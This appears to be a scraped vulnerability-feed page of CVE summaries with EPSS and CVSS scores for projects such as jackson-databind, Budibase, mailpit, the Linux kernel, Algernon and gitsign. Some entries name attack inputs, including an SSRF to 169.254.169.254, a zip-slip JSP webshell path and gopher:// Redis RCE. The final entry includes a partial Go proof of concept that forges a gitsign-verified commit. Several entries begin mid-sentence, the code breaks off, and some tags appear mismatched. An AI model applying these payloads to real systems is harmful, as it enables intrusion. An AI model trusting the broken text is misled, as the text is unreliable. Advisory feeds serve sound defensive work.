PolymorphicTypeValidator bypass in jackson-databind versions 2.10.0 through 2.18.7, 2.19.0 through 2.21.3, and 3.0.0 through 3.1.3 allows attackers controlling JSON type identifiers to smuggle denied gadget classes through allow-listed generic containers, leading to arbitrary class instantiation and potential remote code execution. The flaw stems from DatabindContext._resolveAndValidateGeneric() validating only the raw container class name while skipping all nested generic type arguments. No public exploit identified at time of analysis, but the GHSA advisory includes a proof-of-concept configuration and payload structure.

Canonical Deserialization Jackson Databind +1
NVD GitHub HeroDevs VulDB
EPSS 1% CVSS 7.7
HIGH PATCH This Week

Arbitrary file read in motionEye versions before 0.44.0 lets remote attackers retrieve any file readable by the motionEye process by supplying an absolute path to the media playback, download, and preview handlers. The flaw stems from os.path.join() discarding the configured media directory when given an absolute path, compounded by MoviePlaybackHandler deliberately overriding Tornado's StaticFileHandler path-safety checks. A proof-of-concept exists and the CVSS 4.0 exploit-maturity is rated Proof-of-Concept, but there is no public evidence of active exploitation.

Canonical Python Path Traversal
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

{$exists:true}`) that override the builder's intended filter, returning or altering every document in a MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or JSON-body REST collection. A detailed working POC is published in the advisory; the issue is not in CISA KEV and EPSS is low (0.43%, 34th percentile), so this is publicly demonstrated but not yet confirmed as actively exploited.

SQLi Canonical Docker +4
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Unauthenticated S3 pre-signed URL minting in Budibase (npm @budibase/server before 3.39.0) lets anonymous attackers abuse the route POST /api/attachments/:datasourceId/url, which was registered with only a recaptcha middleware and no authorized() gate. An attacker who knows or enumerates a workspace id (app_...) and an S3 datasource id (ds_...) receives a 15-minute AWS SigV4 pre-signed PutObjectCommand URL minted on the victim's stored IAM credentials, and because the bucket is caller-controlled they can write to any bucket those credentials permit. Publicly available exploit code exists (a self-contained Node.js PoC is published in the advisory); this is not listed in CISA KEV and no EPSS score was provided.

Canonical Authentication Bypass Node.js
NVD GitHub VulDB
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

TLS trust store poisoning in Canonical ADSys through v0.16.2 allows a network-positioned attacker to inject an arbitrary Root CA certificate into managed Ubuntu hosts during Active Directory Certificate Services auto-enrollment. The vendored Samba GPO extension fetches the CA certificate over plaintext HTTP from the AD CS GetCACert endpoint, and the response is registered into the system trust store via update-ca-certificates without authenticity validation. No public exploit identified at time of analysis, but the impact enables persistent decryption of TLS traffic across the host.

Ubuntu Canonical Python +6
NVD GitHub
EPSS 0% CVSS 5.8
MEDIUM PATCH This Month

Incomplete SSRF remediation in mailpit v1.29.2 through v1.30.1 leaves the Link Check API bypassable via IPv6 transition mechanism literals (6to4, NAT64, IPv4-compatible IPv6, ISATAP, Teredo) and unclassified IPv6 prefixes (fec0::/10, 2001:db8::/32) that Go's stdlib Is* classification helpers silently pass. An unauthenticated network attacker who can deliver email to mailpit's SMTP listener and invoke the Link Check API can coerce the application into dialing internal IPv4 destinations - including cloud metadata endpoints at 169.254.169.254 - by encoding the target as an IPv6 literal that returns false for all seven predicates in IsInternalIP, bypassing the guard introduced for CVE-2026-27808. Publicly available exploit code exists in the form of a reproducible unit test and end-to-end proof-of-concept published in the advisory; this is the same deny-list bypass class confirmed in CVE-2026-44430 (MCP Registry) and CVE-2026-45741 (Gotenberg).

Gitlab Python Microsoft +2
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Path traversal in MicroCeph's remote-import API allows enrolled cluster members or join token holders to manipulate files within the `/var/snap/microceph` snap confinement boundary, enabling daemon disruption and cluster state pollution across the squid and tentacle release tracks. The root cause is missing input validation on `name` and `LocalName` parameters in `cmdRemotePut`, permitting `..` sequences to reach unintended directories. No public exploit has been identified at time of analysis; an upstream fix exists as GitHub PR #758 with no confirmed tagged snap release.

Path Traversal Canonical Microceph
NVD GitHub VulDB
EPSS 0% CVSS 4.2
MEDIUM PATCH This Month

Path traversal in Daytona's sandbox volume mount handling (versions <= 0.185.0) allowed a crafted volume reference containing traversal sequences to theoretically resolve the runner's bind-mount source path outside the intended per-volume base directory, with a worst-case impact of cross-tenant read/write access to other tenants' FUSE-mounted volume data. Critically, the vendor confirmed the vulnerability was NOT exploitable in any released version: volume references pass through UUID-type database validation before reaching the runner, structurally rejecting traversal payloads and producing a server-side validation error instead of an unintended mount. No public exploit has been identified and the CVE carries no CISA KEV listing, consistent with a latent code-path defect rather than an active attack surface.

Canonical Information Disclosure
NVD GitHub VulDB
CVSS 8.1
HIGH PATCH This Week

Authorization bypass in Gitea versions 1.22.3 through 1.26.1 allows holders of `public-only` access tokens or OAuth grants to read and modify private account resources via `/api/v1/user/...` self routes, despite the public-only flag being designed to restrict tokens to public data. The flaw is a systemic scope-boundary failure across many self routes (SSH keys, emails, OAuth apps, Actions secrets/variables/runners, private repos, webhooks), publicly available exploit code exists in the form of reproducible Go PoCs in the advisory, and the issue represents an incomplete fix of CVE-2025-68941 in a different route family.

Gitea Canonical Authentication Bypass
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Cache information disclosure in Undici's shared-mode cache interceptor allows a prior authenticated user's HTTP response to be served to a subsequent, potentially unauthenticated, caller. Applications using Undici's explicit `interceptors.cache()` in shared mode that forward Authorization headers to an upstream which returns Cache-Control headers with whitespace-padded qualified directives (e.g., `private=" authorization"`) are affected across all v7 versions prior to 7.28.0 and all v8 versions prior to 8.5.0. No public exploit has been identified at time of analysis; exploitation is bounded by high attack complexity (CVSS AC:H, score 5.9), but when conditions align, the confidentiality impact is complete.

Canonical Information Disclosure Undici +2
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Regex translation in the @astrojs/netlify adapter broadens Astro's image.remotePatterns beyond the intended allowlist when building for Netlify deployment, enabling unauthorized image fetches from apex hosts and deeper URL paths. Versions of @astrojs/netlify prior to 7.0.13 (confirmed vulnerable at 7.0.10) generate Netlify Image CDN regex patterns that make wildcard subdomains optional and omit end-anchoring on pathname segments, causing the Netlify CDN to accept URLs that Astro's canonical matcher would reject. Unauthenticated public requesters can exploit this to cause the Netlify Image CDN to fetch image-like resources from hosts or paths outside the developer's intended scope, constituting a partial SSRF bypass against the image proxy allowlist. No active exploitation has been confirmed in CISA KEV, but a detailed reproduction is included in the GHSA advisory.

Canonical Node.js SSRF
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Algorithm-confusion in Symfony's Mailomat webhook parser allows an attacker to downgrade the HMAC primitive used for signature verification, bypassing webhook authentication. Symfony packages symfony/mailomat-mailer and symfony/symfony versions 7.2.0 through 7.4.12 and 8.0.0 through 8.0.12 accept an attacker-controlled algorithm field from the inbound X-MOM-Webhook-Signature request header and pass it directly to PHP's hash_hmac(), enabling an adversary who can exploit cryptographic weaknesses in weaker HMAC primitives (e.g., HMAC-MD4 existential forgery) to inject fraudulent webhook payloads. No public exploit has been identified at time of analysis, and this CVE is not listed in CISA KEV.

Canonical Jwt Attack PHP +1
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Zip-slip path traversal in filebrowser v2.63.5 and earlier (Linux-hosted) allows any authenticated user with Create permission to plant a file whose name contains URL-encoded Windows-style backslash traversal sequences (`%5C`). The Linux server stores the file with a literal backslash in its name, which `filepath.ToSlash()` silently ignores, and the archive download handler emits that name verbatim into zip/tar central directories. When a Windows victim downloads and extracts the archive using Explorer, 7-Zip, WinRAR, or .NET `ZipFile.ExtractToDirectory`, the extractor interprets `\` as a path separator and writes files to arbitrary locations outside the extraction directory - enabling arbitrary file write on the victim's Windows machine. No public exploit identified at time of analysis beyond the full PoC published in the GHSA advisory; EPSS is 0.03% (8th percentile), consistent with the two-party, victim-interaction requirement.

Path Traversal Canonical Microsoft +1
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

OpenClaw's embedded runner policy incorrectly resolves provider aliases against other aliases rather than their canonical provider identities, enabling an authenticated local user to bypass intended provider policy restrictions. When the affected provider alias feature is active, a low-privileged attacker can select bundled tool access that falls outside the scope their policy should permit, effectively sidestepping the authorization boundary. No public exploit has been identified and no active exploitation is confirmed via CISA KEV; the local attack vector and required feature enablement materially limit real-world exposure.

Canonical Authentication Bypass Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Memory exhaustion and CPU starvation in python-zeroconf before 0.149.12 allows any unauthenticated LAN-adjacent host to OOM-kill or stall the zeroconf process by flooding TC-flagged mDNS queries over UDP/5353. The `AsyncListener.handle_query_or_defer` method retained all TC-bit packets in an unbounded `_deferred[addr]` dictionary - each entry up to 8,966 bytes of raw buffer plus parsed DNS state - with no cap on per-address queue depth or total distinct source addresses, and the per-arrival dedup scan ran O(N) causing quadratic CPU growth as queues expanded. Trivially spoofed source IPs multiply the memory footprint across `_deferred`/`_timers`; on Raspberry Pi-class hardware running Home Assistant, sustained flood traffic causes OOM termination; no public exploit identified at time of analysis.

Python Canonical Denial Of Service +1
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Path traversal in NASA AMMOS AIT-Core's Binary Stream Capture (BSC) component allows unauthenticated remote attackers to direct the ait-bsc process to append attacker-controlled binary data to arbitrary files on the host filesystem, limited only by the OS permissions of the running process. Affected are AIT-Core 3.1.0 and all 2.x versions before 2.6.1, exploitable via a direct HTTP request if the BSC port is network-accessible or via a browser-based CSRF attack that works even against localhost-bound deployments. Publicly available exploit code exists (python_poc.py, attacker_tcp.py, and test1.html), though no CISA KEV listing was identified at time of analysis.

Python Path Traversal RCE +2
NVD GitHub
EPSS 0% CVSS 7.8
HIGH This Week

Local privilege escalation in X.Org X server and Xwayland stems from an incomplete fix for CVE-2025-26597, where CheckKeyTypes() fails to clamp non-canonical key types to XkbMaxShiftLevel, enabling stack-based buffer overflows. Authenticated local users on Red Hat Enterprise Linux 6 through 10 can crash the display server or, when X runs as root, escalate to root privileges. No public exploit identified at time of analysis, though the upstream commit reveals the vulnerable code path and the prior CVE-2025-26597 has known exploitation history.

Canonical Stack Overflow Buffer Overflow +6
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Denial-of-service via quadratic algorithmic complexity in CPython's unicodedata.normalize() affects all CPython versions when processing attacker-controlled Unicode strings. The canonical ordering step during Unicode normalization used an insertion sort algorithm with O(n²) time complexity, which degrades severely when input contains long runs of combining characters with alternating Canonical Combining Class (CCC) values. An unauthenticated remote attacker can cause excessive CPU consumption by submitting small crafted payloads (e.g., 65 characters) to any service that passes untrusted input to unicodedata.normalize(). No public exploit code or CISA KEV listing exists at time of analysis.

Information Disclosure Canonical Cpython
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH POC PATCH This Week

Credential leakage in elixir-tesla (Tesla HTTP client for Elixir) versions 1.4.0 through 1.18.2 allows Authorization and Host headers to be forwarded to attacker-controlled origins during cross-origin HTTP redirects. The Tesla.Middleware.FollowRedirects component compares header names case-sensitively against a lowercase filter list, so headers using the RFC 7235 canonical casing (e.g., 'Authorization') bypass stripping and reach the redirect target. No public exploit identified at time of analysis, but the upstream fix is committed and a patched release (1.18.3) is available.

Information Disclosure Canonical
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Memory exhaustion in python-zeroconf's DNSCache component allows any unauthenticated host on the same Layer-2 segment to OOM-kill or severely degrade processes that consume mDNS/DNS-SD services (CVSS 6.5, AV:A/PR:N). The DNSCache._async_add method imposed no upper bound on cache entries, permitting a local-link attacker to multicast valid mDNS responses with unique names that accumulate across all four internal data structures faster than the 10-second cleanup interval can purge them. A second distinct variant exploits TTL re-advertisement to bloat the internal _expire_heap independently of the cache entry counter, providing a second unbounded growth path that bypasses any entry-count monitoring. No public exploit is identified at time of analysis; a vendor-released patch is available as of zeroconf 0.149.6 or 0.149.7 (minor version discrepancy between sources - see confidence notes).

Canonical Python Denial Of Service +1
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Memory exhaustion in python-zeroconf's exception deduplication logic allows any unauthenticated LAN-adjacent host to permanently pin approximately 9 KB of heap memory per unique malformed mDNS packet, enabling denial of service against zeroconf-dependent applications. The flaw affects all versions of the pip package `zeroconf` prior to 0.149.6; the unbounded `_seen_logs` dict in `QuietLogger` and `DNSIncoming._log_exception_debug` retained full Python traceback objects - and thus raw inbound packet buffers - keyed by attacker-influenced exception strings derived from ephemeral source ports, byte offsets, and pointer links. No public exploit or CISA KEV listing exists at time of analysis, but the attack is mechanistically straightforward and particularly severe on memory-constrained deployments such as Home Assistant on Raspberry Pi-class hardware, where sustained flood traffic can OOM-kill the process and disable HomeKit, Chromecast/Matter, and AirPlay discovery.

Canonical Python Denial Of Service +1
NVD GitHub
EPSS 0% CVSS 5.8
MEDIUM This Month

Memory unsafety in unbounded-spsc 0.2.0 (Rust crate) allows a local attacker with low privileges to cause out-of-bounds reads, allocator corruption, and process crashes by winning a TOCTOU race between Sender::send and Receiver::drop. The root defect is a pointer-as-value transmute in the DISCONNECTED arm of Sender::send (src/lib.rs:384-401): the code transmutes an 8-byte raw pointer (*mut Producer<T>) directly into Consumer<T>, meaning the fake Consumer's internal Arc::ptr points at the Sender struct itself rather than the real ArcInner<Buffer<T>>. No public exploit identified at time of analysis, but a proof-of-concept reproducing SIGSEGV is included in the advisory and reproduces approximately 3 out of 10 trials under heavy contention in release mode.

Information Disclosure Canonical Buffer Overflow
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

IP restriction bypass in Hono's ip-restriction middleware (hono/ip-restriction) prior to version 4.12.21 allows unauthenticated remote attackers to circumvent configured deny and allow rules by submitting non-canonical IPv6 representations of restricted addresses. String equality comparison applied after only partial normalization means that compressed, explicit-zero, or hex-notation IPv4-mapped IPv6 forms of a listed address silently fail to match the normalized rule entry, causing enforcement to be skipped entirely. No public exploit has been identified at time of analysis, but the bypass requires only trivial reformatting of a standard IPv6 address, making it practically low-effort for any attacker aware of the flaw.

Information Disclosure Canonical
NVD GitHub
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Virtual machine escape in Canonical Multipass before 1.16.3 allows a root user inside a guest VM to read arbitrary files on the host filesystem by bypassing the host-side sshfs_server path containment. The flaw lives in the validate_path function (CWE-22 path traversal), which uses naive string prefix matching and accepts dot-dot sequences. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV, though the technical write-up in the GHSA advisory provides enough detail to make exploitation reproducible.

Path Traversal Canonical
NVD GitHub
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Local privilege escalation in Canonical Multipass for macOS before 1.16.3 allows a low-privileged local user to obtain root execution by replacing co-located auxiliary binaries that the multipassd LaunchDaemon invokes via a user-writable PATH directory. The flaw is an incomplete remediation of CVE-2025-5199: while 1.16.0 corrected ownership of the multipassd binary itself, five sibling binaries (multipass, qemu-img, qemu-system-aarch64, qemu-system-x86_64, sshfs_server) were left owned by the installing user and writable, enabling binary planting. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Privilege Escalation Apple Canonical
NVD GitHub
EPSS 0% CVSS 7.6
HIGH PATCH This Week

TLS server impersonation in Erlang/OTP's public_key library lets a name-constrained subordinate CA forge a trusted identity for hostnames outside its permitted DNS subtree. By chaining a nameConstraints enforcement gap with a legacy CommonName fallback in pkix_verify_hostname/3, an attacker holding a DNS-restricted intermediate (e.g. permitted;DNS:allowed.example.com) can issue a SAN-less leaf whose CN is an out-of-scope host (e.g. victim.example.com) and have a stock ssl:connect client with verify_peer accept it. It affects OTP 19.3 through the fixed releases (public_key 1.4 onward) and is rated CVSS 4.0 7.6; there is no public exploit identified at time of analysis and it is not on CISA KEV.

Authentication Bypass Canonical Erlang Otp
NVD GitHub VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Local privilege escalation via memory corruption in Linux Kernel crypto subsystem (acomp) affects systems using asynchronous hardware compression accelerators such as Intel QAT. The flaw stems from acomp_save_req() storing the wrong pointer (&req->chain instead of req itself) in req->base.data, causing the completion callback acomp_reqchain_done() to dereference fields at incorrect offsets. No public exploit identified at time of analysis, and EPSS is very low at 0.02%, but the high CVSS (7.8) reflects potential for memory corruption with high confidentiality, integrity, and availability impact.

Linux Canonical Buffer Overflow +1
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Null-pointer dereference in the Linux kernel's RBD (RADOS Block Device) subsystem crashes the kernel when device_add_disk() fails after device_add() has already succeeded. Systems running Linux kernel with Ceph RBD support enabled are affected across multiple stable branches from the introduction of commit 27c97abc30e2 through the patched releases. A local attacker with sufficient privileges to map RBD images via the sysfs interface can trigger this error path to cause a kernel panic and system-wide denial of service. No active exploitation is confirmed (not in CISA KEV), and the EPSS score of 0.02% at the 5th percentile signals negligible weaponization probability.

Linux Canonical Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use-after-free in the Linux kernel bonding driver's Adaptive Load Balancing (ALB) subsystem allows a local low-privileged user to crash the kernel by racing rlb_arp_recv() against rlb_deinitialize() during rapid bond interface up/down cycling. Specifically, the RX handler continues to dereference rx_hashtbl entries after rlb_deinitialize() frees them, because recv_probe is set to NULL without first draining in-flight softirq handlers via synchronize_net(). Systems running bonded NICs in ALB mode (mode=6) on affected kernel versions - including Dell PowerEdge hardware and Canonical-distributed kernels - are at risk of kernel panic. No public exploit identified at time of analysis, and EPSS at 0.02% (7th percentile) confirms no observed mass exploitation.

Linux Canonical Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Kernel NULL pointer dereference in the Linux TAPRIO traffic scheduler allows a local user with namespace-scoped CAP_NET_ADMIN to trigger a kernel panic. On systems with unprivileged user namespaces enabled - the default on Ubuntu, Fedora, Debian, and most container-oriented distributions - any unprivileged local user can acquire namespace-scoped CAP_NET_ADMIN simply by creating a new network namespace, reducing the effective privilege bar to an ordinary user account. Patched stable releases exist (6.6.141, 6.12.91, 7.0.10, 6.18.33, 7.1-rc2), no active exploitation has been confirmed by CISA KEV, and EPSS is 0.02% (5th percentile), but the straightforward attack sequence and wide Linux footprint make this a priority patch on multi-tenant or container-hosting systems.

Linux Canonical Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Null pointer dereference in the Linux kernel SLIP header compression (slhc) subsystem crashes the kernel when a VJ-compressed frame is received on a PPP instance configured with zero receive slots. An unprivileged local user who can create a user namespace can invoke the PPPIOCSMAXCID ioctl with a crafted argument (0xffff0000) that exploits a signed-integer arithmetic shift to supply rslots=0 to slhc_init(), leaving comp->rstate NULL; any subsequent inbound VJ frame targeting slot 0 then dereferences that NULL pointer in softirq context, producing a kernel panic. No public exploit has been identified at time of analysis, and EPSS probability is negligible at 0.02%, but the attack path is fully reachable from unprivileged user namespaces, making the practical privilege bar lower than the PR:L label implies on systems where user namespaces are enabled.

Linux Canonical Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH This Week

Linked Data Signature forgery in Fedify (the @fedify/fedify ActivityPub server framework) before 2.2.3 lets remote unauthenticated attackers reshape a third-party-signed activity so it is interpreted differently while its signature still verifies. Because the signature covers the canonical RDF graph rather than the JSON-LD serialization, an attacker who has received a signed activity can use JSON-LD keywords (@graph, @reverse, @included) or context-alias tricks to promote, hide, or rewrite fields and have the forged result accepted as authentic. There is no public exploit identified at time of analysis and the issue is not in CISA KEV, but the GitHub Security Advisory documents the exact restructuring techniques in detail.

RCE Canonical
NVD GitHub
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Two-layer blind SSRF in Crawlee for Python (pip/crawlee >= 1.0.0, < 1.7.0) allows an attacker who controls a sitemap or robots.txt file to force the crawler to issue HTTP requests against internal network services (layer 1, all HTTP clients), and - when CurlImpersonateHttpClient is configured - to dispatch non-HTTP scheme requests including gopher://, file://, dict://, and ftp:// (layer 2). The layer 2 escalation enables canonical Redis exploitation via gopher://, making RCE on unauthenticated internal Redis instances achievable from a public-facing crawler. No public exploit code has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog, but the researcher-credited advisory details a fully articulated attack path including Redis RCE.

SSRF Redis RCE +2
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Cross-origin read access to Algernon's SSE auto-refresh event server (versions ≤ 1.17.6) allows any web page visited by a developer to silently subscribe to the live file-change stream via a browser-native EventSource. The root cause is a hardcoded wildcard `Access-Control-Allow-Origin: *` response header in the dedicated SSE port activated by the `-a` flag, with no origin inspection or allow-list logic present in the vendored recwatch handler. No public exploit identified at time of analysis per KEV absence, though a complete working proof-of-concept - including exploit HTML and curl verification transcript - is published in GHSA-hw27-4v2q-5qff.

Information Disclosure Cors Misconfiguration Microsoft +2
NVD GitHub
EPSS 0% CVSS 3.8
LOW PATCH Monitor

Authorization bypass in Caddy's remote admin `/config` API (versions 2.4.0-2.11.2) allows a certificate-authenticated remote admin client restricted to a specific array-indexed config path (e.g., `/routes/0`) to read and modify sibling array elements (e.g., `routes[1]`) by requesting the path with a leading-zero index variant (`/routes/01`). The root cause is a semantic mismatch between two internal layers: the authorization layer performs string prefix matching (`strings.HasPrefix`), while the config traversal layer parses index components numerically via `strconv.Atoi()`, so `"01"` passes authorization as a prefix of `"0"` but resolves to integer index 1 during traversal. No public exploit is in CISA KEV, but a complete proof-of-concept with captured curl requests and server responses is publicly documented in the vendor GitHub advisory GHSA-x5w9-xh9r-mvfc.

File Upload OpenSSL Canonical
NVD GitHub VulDB
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Shell command injection in go-git's SSH transport allows attackers who control repository path values to execute arbitrary shell commands on SSH servers that evaluate exec commands through a login shell. go-git wraps repository paths in single quotes without escaping embedded single-quote characters, diverging from canonical Git's sq_quote_buf behavior. When a go-git client connects to an SSH server whose exec command passes through /bin/sh, /bin/bash, or a ForceCommand wrapper that re-evaluates $SSH_ORIGINAL_COMMAND, an attacker-influenced path containing a single quote can break out of the quoted region and append arbitrary shell tokens. No public exploit identified at time of analysis.

Information Disclosure Canonical
NVD GitHub VulDB
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

Pre-authenticated remote code execution in Algernon web server (≤ 1.17.6) allows attackers who can place a handler.lua file anywhere in a parent directory of the server root to execute arbitrary Lua - including shell commands via run3() and os.execute - in the server process on the next HTTP request. The flaw stems from DirPage walking up to 100 ancestor directories past the configured server root searching for handler.lua, and the permission middleware does not gate this lookup, so an anonymous GET / suffices to trigger execution. Publicly available exploit code exists (the reporter published three working PoC variants and a live verification against 1.17.6).

Microsoft Redis RCE +1
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

{id}.html endpoint, leaking titles, internal IDs, languages, and category bindings via 301 redirect Location headers. The flaw stems from a missing permission filter in the getIdFromSolutionId() method, and a publicly available exploit code path is documented in the GitHub Security Advisory (GHSA-99qv-g4x9-mgc3) with SSVC marking exploitation as PoC and automatable. EPSS is low (0.06%, 19th percentile) and the issue is not in CISA KEV, indicating no confirmed active exploitation despite the high CVSS 4.0 score of 8.7.

Authentication Bypass Canonical Information Disclosure
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Rate limiter bypass in better-auth versions < 1.4.17 allows attackers to defeat authentication attempt limits by rotating through IPv6 addresses within their allocated /64 prefix or using different textual representations of the same address. The vulnerability affects authentication endpoints including sign-in, sign-up, and password reset when serving IPv6 clients, which includes most cloud providers by default. No public exploit identified at time of analysis.

Google Canonical Authentication Bypass
NVD GitHub
EPSS 0% CVSS 9.0
CRITICAL Act Now

Stored cross-site scripting in SiYuan's Bazaar marketplace (versions ≤ 3.6.5) escalates to arbitrary OS command execution on the Electron desktop client because the kernel sanitizer in kernel/bazaar/package.go HTML-escapes only Author, DisplayName, and Description while passing Name and Version straight to innerHTML sinks. Any attacker who can publish a plugin/theme/template/widget/icon manifest to the public Bazaar - or otherwise drop a malicious plugin.json into the workspace - triggers zero-click code execution the moment a victim opens Settings → Marketplace → Downloaded → Plugins. A detailed POC against b3log/siyuan:v3.6.5 is published in the GHSA advisory; publicly available exploit code exists, though EPSS remains low at 0.04%.

XSS Command Injection Canonical +2
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, efw.file.FileManager.unZip writes zip entries to disk using new File(baseDir, zipEntry.getName()) with no canonical-path check. An entry name such as ../../../pwned.jsp escapes the intended extraction directory and lands anywhere the Tomcat process can write - including the servlet context root. Combined with the framework's multipart /uploadServlet and an event that calls file.saveUploadFiles + FileManager.unZip, a remote attacker with no credentials drops a JSP webshell and executes arbitrary commands as the Tomcat user. This vulnerability is fixed in 4.08.010.

Canonical Command Injection Tomcat
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

protobufjs versions 7.5.5 and earlier, and 8.0.0-8.0.1 accept overlong UTF-8 byte sequences in the minimal UTF-8 decoder used by non-Node and fallback decoding paths, allowing attackers to bypass byte-level filtering and decode strings containing characters that were not present in the raw protobuf binary input. This integrity issue affects applications that rely on pre-decoding byte validation before using protobuf strings in security-sensitive contexts. Patch versions 7.5.6 and 8.0.2 are available; Node.js Buffer-backed paths are not directly affected.

Canonical Node.js Information Disclosure +1
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

{ // re-encodes canonical form return err } r, _ := c2.Reader() data, _ := io.ReadAll(r) summary, err := v.Verify(ctx, data, sig, true) // verifies re-encoded bytes, not raw bytes ``` The same pattern appears in `verify-tag`: ```go // internal/commands/verify-tag/verify_tag.go:76-95 tagData := new(plumbing.MemoryObject) if err := tagObj.EncodeWithoutSignature(tagData); err != nil { return err } ``` The codebase itself acknowledges the problem in `ObjectHash`: ```go // pkg/git/verify.go:137-142 // We're making big assumptions here about the ordering of fields // in Git objects. Unfortunately go-git does loose parsing of objects, // so it will happily decode objects that don't match the unmarshal type. // We should see if there's a better way to detect object types. switch { case bytes.HasPrefix(data, []byte("tree ")): encoder, err = commit(obj, sig) ``` go-git's loose parsing means that for a commit containing two `tree` headers, it silently discards the first and retains the second. `EncodeWithoutSignature` then produces a canonical commit body containing only the second tree - which can differ from what git-core resolves. The `git verify-commit` path (`internal/commands/root/verify.go`) receives the raw commit bytes directly from git-core and does **not** re-encode them: ```go // internal/commands/root/verify.go:56-70 detached := len(args) >= 2 if detached { data, sig, err = readDetached(s, args...) // raw bytes from git-core } else { sig, err = readAttached(s, args...) } ... summary, err := v.Verify(ctx, data, sig, true) // raw bytes, no re-encoding ``` The two paths therefore reach opposite conclusions for the same malformed commit: `git verify-commit` fails (raw bytes with both trees ≠ signed canonical bytes), while `gitsign verify` succeeds (re-encoded bytes match signed bytes). An attacker does not need a signing key to trigger the confusion. Given any existing legitimately gitsign-signed commit from Alice: ``` tree T1 ← Alice's real tree (what go-git and gitsign see) author Alice <alice@corp.com> ... committer Alice <alice@corp.com> ... gpgsig -----BEGIN SIGNED MESSAGE----- <Alice's valid signature over T1 canonical form> -----END SIGNED MESSAGE----- This is Alice's commit. ``` An attacker crafts a new malformed commit object: ``` tree T2 ← attacker's malicious tree (git-core uses this) tree T1 ← Alice's tree (go-git uses this) author Alice <alice@corp.com> ... committer Alice <alice@corp.com> ... gpgsig -----BEGIN SIGNED MESSAGE----- <Alice's valid signature - replayed verbatim> -----END SIGNED MESSAGE----- This is Alice's commit. ``` - **`gitsign verify`**: go-git picks T1, re-encodes, Alice's signature verifies. Output: "Good signature from alice@corp.com." - **`git log` / `git-core`**: uses T2 (attacker-controlled content). - **Rekor lookup**: `ObjectHash` also goes through the go-git round-trip, so the logged hash is the T1-canonical hash - consistent with the forged verification output but not with the actual raw object. The attack requires only that the malformed object be accepted into the local repository (bypassing server-side fsck), and that the victim runs `gitsign verify`. ```go // poc_tree_mismatch.go - run from repo root: go run ./poc_tree_mismatch.go package main import ( "context" "crypto" "crypto/ecdsa" "crypto/elliptic" "crypto/rand" "crypto/x509" "crypto/x509/pkix" "fmt" "io" "math/big" "strings" "time" "github.com/go-git/go-git/v5/plumbing" "github.com/go-git/go-git/v5/plumbing/object" "github.com/go-git/go-git/v5/storage/memory" "github.com/sigstore/gitsign/internal/signature" ggit "github.com/sigstore/gitsign/pkg/git" ) type identity struct { cert *x509.Certificate priv crypto.Signer } func (i *identity) Certificate() (*x509.Certificate, error) { return i.cert, nil } func (i *identity) CertificateChain() ([]*x509.Certificate, error) { return []*x509.Certificate{i.cert}, nil } func (i *identity) Signer() (crypto.Signer, error) { return i.priv, nil } func (i *identity) Delete() error { return nil } func (i *identity) Close() {} func indentSig(sig string) string { sig = strings.TrimSuffix(sig, "\n") lines := strings.Split(sig, "\n") out := "gpgsig " + lines[0] + "\n" for _, ln := range lines[1:] { out += " " + ln + "\n" } return out } func main() { priv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) tmpl := &x509.Certificate{ SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "attacker"}, NotBefore: time.Now().Add(-time.Minute), NotAfter: time.Now().Add(time.Hour), KeyUsage: x509.KeyUsageDigitalSignature, ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageCodeSigning}, BasicConstraintsValid: true, } rawCert, _ := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv) cert, _ := x509.ParseCertificate(rawCert) treeFirst := strings.Repeat("a", 40) // git-core uses this treeSecond := strings.Repeat("b", 40) // go-git uses this author := "author Eve <eve@example.com> 1700000000 +0000" committer := "committer Eve <eve@example.com> 1700000000 +0000" msg := "msg\n" // Sign the go-git canonical form (second tree only) canonicalData := fmt.Sprintf("tree %s\n%s\n%s\n\n%s", treeSecond, author, 